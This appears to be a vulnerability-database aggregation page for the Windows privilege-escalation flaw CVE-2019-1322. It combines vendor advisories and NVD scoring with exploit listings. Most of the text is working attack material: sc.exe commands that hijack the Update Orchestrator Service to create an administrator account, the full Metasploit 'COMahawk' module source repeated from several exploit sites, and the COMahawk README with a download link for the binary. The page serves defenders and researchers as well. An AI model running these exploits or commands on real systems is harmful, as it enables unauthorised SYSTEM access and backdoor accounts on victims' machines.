Microsoft Windows CVE-2019-1322 Local Privilege Escalation Vulnerability
2019-10-08T00:00:00
ID SMNTC-110268 Type symantec Reporter Symantec Security Response Modified 2019-10-08T00:00:00
Description
Description
Microsoft Windows is prone to a local privilege-escalation vulnerability. An attacker can exploit this issue to gain elevated privileges.
Technologies Affected
Microsoft Windows 10 Version 1803 for 32-bit Systems
Microsoft Windows 10 Version 1803 for ARM64-based Systems
Microsoft Windows 10 Version 1803 for x64-based Systems
Microsoft Windows 10 Version 1809 for 32-bit Systems
Microsoft Windows 10 Version 1809 for ARM64-based Systems
Microsoft Windows 10 Version 1809 for x64-based Systems
Microsoft Windows 10 Version 1903 for 32-bit Systems
Microsoft Windows 10 Version 1903 for ARM64-based Systems
Microsoft Windows 10 Version 1903 for x64-based Systems
Microsoft Windows Server 1803
Microsoft Windows Server 1903
Microsoft Windows Server 2019
Recommendations
Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.
Ensure that only trusted users have local, interactive access to affected computers.
Updates are available. Please see the references or vendor advisory for more information.
{"id": "SMNTC-110268", "type": "symantec", "bulletinFamily": "software", "title": "Microsoft Windows CVE-2019-1322 Local Privilege Escalation Vulnerability", "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. An attacker can exploit this issue to gain elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 Version 1809 for 32-bit Systems \n * Microsoft Windows 10 Version 1809 for ARM64-based Systems \n * Microsoft Windows 10 Version 1809 for x64-based Systems \n * Microsoft Windows 10 Version 1903 for 32-bit Systems \n * Microsoft Windows 10 Version 1903 for ARM64-based Systems \n * Microsoft Windows 10 Version 1903 for x64-based Systems \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 1903 \n * Microsoft Windows Server 2019 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "published": "2019-10-08T00:00:00", "modified": "2019-10-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/110268", "reporter": "Symantec Security Response", "references": [], "cvelist": ["CVE-2019-1322"], "lastseen": "2019-10-08T22:36:21", "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-1322"]}, {"type": "attackerkb", "idList": ["AKB:8011789D-8681-4C89-A088-8E14D395987F"]}, {"type": "mscve", "idList": ["MS:CVE-2019-1322"]}, {"type": "exploitdb", "idList": ["EDB-ID:47805", "EDB-ID:47684"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:35553BEFF42A94A5A731E9C926E550DD"]}, {"type": "zdt", "idList": ["1337DAY-ID-33685", "1337DAY-ID-33566"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/COMAHAWK", "MSF:EXPLOIT/WINDOWS/LOCAL/COMAHAWK/"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155723"]}, {"type": "kaspersky", "idList": ["KLA11574"]}, {"type": "nessus", "idList": ["SMB_NT_MS19_OCT_4519338.NASL", "SMB_NT_MS19_OCT_4520008.NASL", "SMB_NT_MS19_OCT_4517389.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815488", "OPENVAS:1361412562310815493", "OPENVAS:1361412562310815497"]}, {"type": "talosblog", "idList": ["TALOSBLOG:3052A7B74E1E13F630CF51AB1B1A36D6"]}], "modified": "2019-10-08T22:36:21", "rev": 2}, "score": {"value": 4.2, "vector": "NONE", "modified": "2019-10-08T22:36:21", "rev": 2}, "vulnersScore": 4.2}, "affectedSoftware": [{"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1803 for x64-based Systems"}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1809 for 32-bit Systems"}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1903 for x64-based Systems"}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1809 for x64-based Systems"}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1809 for ARM64-based Systems"}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1903 for ARM64-based Systems"}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "1803"}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "1903"}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1903 for 32-bit Systems"}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1803 for 32-bit Systems"}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2019"}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1803 for ARM64-based Systems"}]}
{"cve": [{"lastseen": "2020-10-03T13:38:42", "description": "An elevation of privilege vulnerability exists when Windows improperly handles authentication requests, aka 'Microsoft Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1320, CVE-2019-1340.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-10T14:15:00", "title": "CVE-2019-1322", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1322"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2019-1322", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1322", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2020-11-18T06:44:45", "bulletinFamily": "info", "cvelist": ["CVE-2019-1320", "CVE-2019-1322", "CVE-2019-1340"], "description": "An elevation of privilege vulnerability exists when Windows improperly handles authentication requests, aka \u2018Microsoft Windows Elevation of Privilege Vulnerability\u2019. This CVE ID is unique from CVE-2019-1320, CVE-2019-1340.\n\n \n**Recent assessments:** \n \n**goodlandsecurity** at March 25, 2020 3:59pm UTC reported:\n\nThis is an elevation of privilege vulnerability that exists when Windows improperly handles authentication requests by leveraging the Update Orchestrator Service. If an attacker successfully exploits this vulnerability they can run processes in an elevated context.\n\n**Prerequisite**:\n\nThe Update Orchestrator Service runs as NT AUTHORITY\\SYSTEM and any user in the group NT AUTHORITY\\SERVICE have full access to modify the service.\n\nIt is known to affect Windows 10 1803 and above that have not been updated with the November 12th, 2019 security update patch (or above).\n\n**Exploitation**:\n\nCreate tmpUser, add to local administrators group, and reset the service to its default state.\n \n \n sc.exe stop UsoSvc\n sc.exe config UsoSvc binPath=\"cmd /c net user /add tmpUser tmpPassword123\"\n sc.exe start UsoSvc\n sc.exe stop UsoSvc\n sc.exe config UsoSvc binPath=\"cmd /c net localgroup Administrators /add tmpUser\"\n sc.exe start UsoSvc\n sc.exe stop UsoSvc\n sc.exe config UsoSvc binPath=\"C:\\Windows\\System32\\svchost.exe -k netsvcs -p\"\n sc.exe start UsoSvc\n \n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2020-07-30T00:00:00", "published": "2019-10-10T00:00:00", "id": "AKB:8011789D-8681-4C89-A088-8E14D395987F", "href": "https://attackerkb.com/topics/1WUDxw105j/cve-2019-1322", "type": "attackerkb", "title": "CVE-2019-1322", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2020-08-07T11:48:23", "bulletinFamily": "microsoft", "cvelist": ["CVE-2019-1322"], "description": "An elevation of privilege vulnerability exists when Windows improperly handles authentication requests. An attacker who successfully exploited this vulnerability could run processes in an elevated context.\n\nAn attacker could exploit this vulnerability by running a specially crafted application on the victim system.\n\nThe update addresses the vulnerability by correcting the way Windows handles authentication requests.\n", "edition": 2, "modified": "2019-10-09T07:00:00", "id": "MS:CVE-2019-1322", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1322", "published": "2019-10-09T07:00:00", "title": "Microsoft Windows Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2019-12-19T15:16:00", "description": "", "published": "2019-12-18T00:00:00", "type": "packetstorm", "title": "Microsoft UPnP Local Privilege Elevation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1322", "CVE-2019-1405"], "modified": "2019-12-18T00:00:00", "id": "PACKETSTORM:155723", "href": "https://packetstormsecurity.com/files/155723/Microsoft-UPnP-Local-Privilege-Elevation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core/post/common' \nrequire 'msf/core/post/file' \nrequire 'msf/core/post/windows/priv' \nrequire 'msf/core/post/windows/registry' \nrequire 'msf/core/exploit/exe' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Post::Common \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft UPnP Local Privilege Elevation Vulnerability', \n'Description' => %q( \nThis exploit uses two vulnerabilities to execute a command as an elevated user. \nThe first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to \nNT AUTHORITY\\LOCAL SERVICE \nThe second (CVE-2019-1322) leverages the Update Orchestrator Service to \nelevate from NT AUTHORITY\\LOCAL SERVICE to NT AUTHORITY\\SYSTEM. \n), \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'NCC Group', # Original discovery (https://www.nccgroup.trust/uk/) \n'hoangprod', # PoC \n'bwatters-r7' # msf module \n], \n'Platform' => ['win'], \n'SessionTypes' => ['meterpreter'], \n'Targets' => \n[ \n['Windows x64', { 'Arch' => ARCH_X64 }] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Nov 12 2019', \n'References' => \n[ \n['CVE', '2019-1322'], \n['CVE', '2019-1405'], \n['EDB', '47684'], \n['URL', 'https://github.com/apt69/COMahawk'], \n['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/'], \n['URL', 'https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1'] \n], \n'DefaultOptions' => \n{ \n'DisablePayloadHandler' => false \n} \n)) \n \nregister_options([ \nOptString.new('EXPLOIT_NAME', \n[false, 'The filename to use for the exploit binary (%RAND% by default).', nil]), \nOptString.new('PAYLOAD_NAME', \n[false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]), \nOptString.new('WRITABLE_DIR', \n[false, 'Path to write binaries (%TEMP% by default).', nil]), \nOptInt.new('EXPLOIT_TIMEOUT', \n[true, 'The number of seconds to wait for exploit to finish running', 60]), \nOptInt.new('EXECUTE_DELAY', \n[true, 'The number of seconds to delay between file upload and exploit launch', 3]) \n]) \nend \n \ndef exploit \nexploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha(6..14) \npayload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14) \nexploit_name = \"#{exploit_name}.exe\" unless exploit_name.end_with?('.exe') \npayload_name = \"#{payload_name}.exe\" unless payload_name.end_with?('.exe') \ntemp_path = datastore['WRITABLE_DIR'] || session.sys.config.getenv('TEMP') \npayload_path = \"#{temp_path}\\\\#{payload_name}\" \nexploit_path = \"#{temp_path}\\\\#{exploit_name}\" \npayload_exe = generate_payload_exe \n \n# Check target \nvprint_status(\"Checking Target\") \nvalidate_active_host \nvalidate_target \nfail_with(Failure::BadConfig, \"#{temp_path} does not exist on the target\") unless directory?(temp_path) \n \n# Upload Exploit \nvprint_status(\"Uploading exploit to #{sysinfo['Computer']} as #{exploit_path}\") \nensure_clean_destination(exploit_path) \nexploit_bin = exploit_data('cve-2019-1322', 'CVE-2019-1322-EXE.exe') \nwrite_file(exploit_path, exploit_bin) \nprint_status(\"Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}\") \n \n# Upload Payload \nvprint_status(\"Uploading Payload\") \nensure_clean_destination(payload_path) \nwrite_file(payload_path, payload_exe) \nprint_status(\"Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}\") \nprint_warning(\"This exploit requires manual cleanup of the payload #{payload_path}\") \n \n# Run Exploit \nvprint_status(\"Running Exploit\") \nprint_status(\"It may take a moment after the session is established for the exploit to exit safely.\") \nbegin \ncmd_exec('cmd.exe', \"/c #{exploit_path} #{payload_path}\", 60) \nrescue Rex::TimeoutError => e \nelog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\") \nprint_error(\"Caught timeout. Exploit may be taking longer or it may have failed.\") \nend \nvprint_status(\"Cleaning up #{exploit_path}\") \nensure_clean_destination(exploit_path) \nend \n \ndef validate_active_host \nbegin \nprint_status(\"Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\") \nrescue Rex::Post::Meterpreter::RequestError => e \nelog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\") \nraise Msf::Exploit::Failed, 'Could not connect to session' \nend \nend \n \ndef validate_target \nif sysinfo['Architecture'] == ARCH_X86 \nfail_with(Failure::NoTarget, 'Exploit code is 64-bit only') \nend \nsysinfo_value = sysinfo['OS'] \nbuild_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i \nvprint_status(\"Build Number = #{build_num}\") \nunless sysinfo_value =~ /10/ && (build_num > 17133 && build_num < 18362) \nfail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17133-18362') \nend \nend \n \ndef ensure_clean_destination(path) \nreturn unless file?(path) \nprint_status(\"#{path} already exists on the target. Deleting...\") \nbegin \nfile_rm(path) \nprint_status(\"Deleted #{path}\") \nrescue Rex::Post::Meterpreter::RequestError => e \nelog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\") \nprint_error(\"Unable to delete #{path}\") \nend \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/155723/comahawk.rb.txt"}], "exploitdb": [{"lastseen": "2019-12-30T15:24:13", "description": "", "published": "2019-12-30T00:00:00", "type": "exploitdb", "title": "Microsoft UPnP - Local Privilege Elevation (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1405", "CVE-2019-1322"], "modified": "2019-12-30T00:00:00", "id": "EDB-ID:47805", "href": "https://www.exploit-db.com/exploits/47805", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core/post/common'\r\nrequire 'msf/core/post/file'\r\nrequire 'msf/core/post/windows/priv'\r\nrequire 'msf/core/post/windows/registry'\r\nrequire 'msf/core/exploit/exe'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Post::Common\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Priv\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Microsoft UPnP Local Privilege Elevation Vulnerability',\r\n 'Description' => %q(\r\n This exploit uses two vulnerabilities to execute a command as an elevated user.\r\n The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to\r\n NT AUTHORITY\\LOCAL SERVICE\r\n The second (CVE-2019-1322) leverages the Update Orchestrator Service to\r\n elevate from NT AUTHORITY\\LOCAL SERVICE to NT AUTHORITY\\SYSTEM.\r\n ),\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'NCC Group', # Original discovery (https://www.nccgroup.trust/uk/)\r\n 'hoangprod', # PoC\r\n 'bwatters-r7' # msf module\r\n ],\r\n 'Platform' => ['win'],\r\n 'SessionTypes' => ['meterpreter'],\r\n 'Targets' =>\r\n [\r\n ['Windows x64', { 'Arch' => ARCH_X64 }]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Nov 12 2019',\r\n 'References' =>\r\n [\r\n ['CVE', '2019-1322'],\r\n ['CVE', '2019-1405'],\r\n ['EDB', '47684'],\r\n ['URL', 'https://github.com/apt69/COMahawk'],\r\n ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/'],\r\n ['URL', 'https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1']\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'DisablePayloadHandler' => false\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new('EXPLOIT_NAME',\r\n [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),\r\n OptString.new('PAYLOAD_NAME',\r\n [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),\r\n OptString.new('WRITABLE_DIR',\r\n [false, 'Path to write binaries (%TEMP% by default).', nil]),\r\n OptInt.new('EXPLOIT_TIMEOUT',\r\n [true, 'The number of seconds to wait for exploit to finish running', 60]),\r\n OptInt.new('EXECUTE_DELAY',\r\n [true, 'The number of seconds to delay between file upload and exploit launch', 3])\r\n ])\r\n end\r\n\r\n def exploit\r\n exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha(6..14)\r\n payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14)\r\n exploit_name = \"#{exploit_name}.exe\" unless exploit_name.end_with?('.exe')\r\n payload_name = \"#{payload_name}.exe\" unless payload_name.end_with?('.exe')\r\n temp_path = datastore['WRITABLE_DIR'] || session.sys.config.getenv('TEMP')\r\n payload_path = \"#{temp_path}\\\\#{payload_name}\"\r\n exploit_path = \"#{temp_path}\\\\#{exploit_name}\"\r\n payload_exe = generate_payload_exe\r\n\r\n # Check target\r\n vprint_status(\"Checking Target\")\r\n validate_active_host\r\n validate_target\r\n fail_with(Failure::BadConfig, \"#{temp_path} does not exist on the target\") unless directory?(temp_path)\r\n\r\n # Upload Exploit\r\n vprint_status(\"Uploading exploit to #{sysinfo['Computer']} as #{exploit_path}\")\r\n ensure_clean_destination(exploit_path)\r\n exploit_bin = exploit_data('cve-2019-1322', 'CVE-2019-1322-EXE.exe')\r\n write_file(exploit_path, exploit_bin)\r\n print_status(\"Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}\")\r\n\r\n # Upload Payload\r\n vprint_status(\"Uploading Payload\")\r\n ensure_clean_destination(payload_path)\r\n write_file(payload_path, payload_exe)\r\n print_status(\"Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}\")\r\n print_warning(\"This exploit requires manual cleanup of the payload #{payload_path}\")\r\n\r\n # Run Exploit\r\n vprint_status(\"Running Exploit\")\r\n print_status(\"It may take a moment after the session is established for the exploit to exit safely.\")\r\n begin\r\n cmd_exec('cmd.exe', \"/c #{exploit_path} #{payload_path}\", 60)\r\n rescue Rex::TimeoutError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n print_error(\"Caught timeout. Exploit may be taking longer or it may have failed.\")\r\n end\r\n vprint_status(\"Cleaning up #{exploit_path}\")\r\n ensure_clean_destination(exploit_path)\r\n end\r\n\r\n def validate_active_host\r\n begin\r\n print_status(\"Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\")\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n raise Msf::Exploit::Failed, 'Could not connect to session'\r\n end\r\n end\r\n\r\n def validate_target\r\n if sysinfo['Architecture'] == ARCH_X86\r\n fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')\r\n end\r\n sysinfo_value = sysinfo['OS']\r\n build_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i\r\n vprint_status(\"Build Number = #{build_num}\")\r\n unless sysinfo_value =~ /10/ && (build_num > 17133 && build_num < 18362)\r\n fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17133-18362')\r\n end\r\n end\r\n\r\n def ensure_clean_destination(path)\r\n return unless file?(path)\r\n print_status(\"#{path} already exists on the target. Deleting...\")\r\n begin\r\n file_rm(path)\r\n print_status(\"Deleted #{path}\")\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n print_error(\"Unable to delete #{path}\")\r\n end\r\n end\r\nend", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/47805"}, {"lastseen": "2019-11-19T15:48:40", "description": "", "published": "2019-11-14T00:00:00", "type": "exploitdb", "title": "Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1405", "CVE-2019-1322"], "modified": "2019-11-14T00:00:00", "id": "EDB-ID:47684", "href": "https://www.exploit-db.com/exploits/47684", "sourceData": "##\u00a0EDB Note\r\nDownload:\r\n- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-1.exe\r\n- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-2.zip\r\n\r\n\r\n# COMahawk\r\n**Privilege Escalation: Weaponizing CVE-2019-1405 and CVE-2019-1322**\r\n\r\n## Video Demo\r\nhttps://vimeo.com/373051209\r\n\r\n## Usage\r\n\r\n### Compile or Download from Release (https://github.com/apt69/COMahawk/releases)\r\n\r\n1. Run COMahawk.exe\r\n2. ???\r\n3. Hopefully profit\r\n\r\nor\r\n\r\n1. COMahawk.exe \"custom command to run\" (ie. COMahawk.exe \"net user /add test123 lol123 &\")\r\n2. ???\r\n3. Hopefully profit\r\n\r\n## Concerns\r\n**MSDN mentioned that only 1803 to 1903 is vulnerable to CVE-2019-1322. If it doesn't work, maybe it was patched.**\r\n\r\nHowever, it is confirmed that my 1903 does indeed have this bug so maybe it was introduced somewhere inbetween. YMMV.\r\n\r\nAlso, since you are executing from a service - you most likely cannot spawn any Window hence all command will be \"GUI-less\". Maybe different session? Idk, it is too late and I am tired haha.\r\n\r\n## Credits:\r\nhttps://twitter.com/leoloobeek for helping me even when he doesn't even have a laptop\r\n\r\nhttps://twitter.com/TomahawkApt69 for being the mental support and motivation\r\n\r\nand most of all:\r\n\r\nhttps://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/\r\n\r\nfor discovering and publishing the write up. 100% of the credit goes here.", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/47684"}], "zdt": [{"lastseen": "2019-12-19T13:02:16", "description": "This Metasploit module exploits two vulnerabilities to execute a command as an elevated user. The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to NT AUTHORITY\\LOCAL SERVICE. The second (CVE-2019-1322) leverages the Update Orchestrator Service to elevate from NT AUTHORITY\\LOCAL SERVICE to NT AUTHORITY\\SYSTEM.", "edition": 1, "published": "2019-12-19T00:00:00", "title": "Microsoft UPnP Local Privilege Elevation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1322", "CVE-2019-1405"], "modified": "2019-12-19T00:00:00", "id": "1337DAY-ID-33685", "href": "https://0day.today/exploit/description/33685", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core/post/common'\r\nrequire 'msf/core/post/file'\r\nrequire 'msf/core/post/windows/priv'\r\nrequire 'msf/core/post/windows/registry'\r\nrequire 'msf/core/exploit/exe'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Post::Common\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Priv\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Microsoft UPnP Local Privilege Elevation Vulnerability',\r\n 'Description' => %q(\r\n This exploit uses two vulnerabilities to execute a command as an elevated user.\r\n The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to\r\n NT AUTHORITY\\LOCAL SERVICE\r\n The second (CVE-2019-1322) leverages the Update Orchestrator Service to\r\n elevate from NT AUTHORITY\\LOCAL SERVICE to NT AUTHORITY\\SYSTEM.\r\n ),\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'NCC Group', # Original discovery (https://www.nccgroup.trust/uk/)\r\n 'hoangprod', # PoC\r\n 'bwatters-r7' # msf module\r\n ],\r\n 'Platform' => ['win'],\r\n 'SessionTypes' => ['meterpreter'],\r\n 'Targets' =>\r\n [\r\n ['Windows x64', { 'Arch' => ARCH_X64 }]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Nov 12 2019',\r\n 'References' =>\r\n [\r\n ['CVE', '2019-1322'],\r\n ['CVE', '2019-1405'],\r\n ['EDB', '47684'],\r\n ['URL', 'https://github.com/apt69/COMahawk'],\r\n ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/'],\r\n ['URL', 'https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1']\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'DisablePayloadHandler' => false\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new('EXPLOIT_NAME',\r\n [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),\r\n OptString.new('PAYLOAD_NAME',\r\n [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),\r\n OptString.new('WRITABLE_DIR',\r\n [false, 'Path to write binaries (%TEMP% by default).', nil]),\r\n OptInt.new('EXPLOIT_TIMEOUT',\r\n [true, 'The number of seconds to wait for exploit to finish running', 60]),\r\n OptInt.new('EXECUTE_DELAY',\r\n [true, 'The number of seconds to delay between file upload and exploit launch', 3])\r\n ])\r\n end\r\n\r\n def exploit\r\n exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha(6..14)\r\n payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14)\r\n exploit_name = \"#{exploit_name}.exe\" unless exploit_name.end_with?('.exe')\r\n payload_name = \"#{payload_name}.exe\" unless payload_name.end_with?('.exe')\r\n temp_path = datastore['WRITABLE_DIR'] || session.sys.config.getenv('TEMP')\r\n payload_path = \"#{temp_path}\\\\#{payload_name}\"\r\n exploit_path = \"#{temp_path}\\\\#{exploit_name}\"\r\n payload_exe = generate_payload_exe\r\n\r\n # Check target\r\n vprint_status(\"Checking Target\")\r\n validate_active_host\r\n validate_target\r\n fail_with(Failure::BadConfig, \"#{temp_path} does not exist on the target\") unless directory?(temp_path)\r\n\r\n # Upload Exploit\r\n vprint_status(\"Uploading exploit to #{sysinfo['Computer']} as #{exploit_path}\")\r\n ensure_clean_destination(exploit_path)\r\n exploit_bin = exploit_data('cve-2019-1322', 'CVE-2019-1322-EXE.exe')\r\n write_file(exploit_path, exploit_bin)\r\n print_status(\"Exploit uploaded on #{sysinfo['Computer']} to 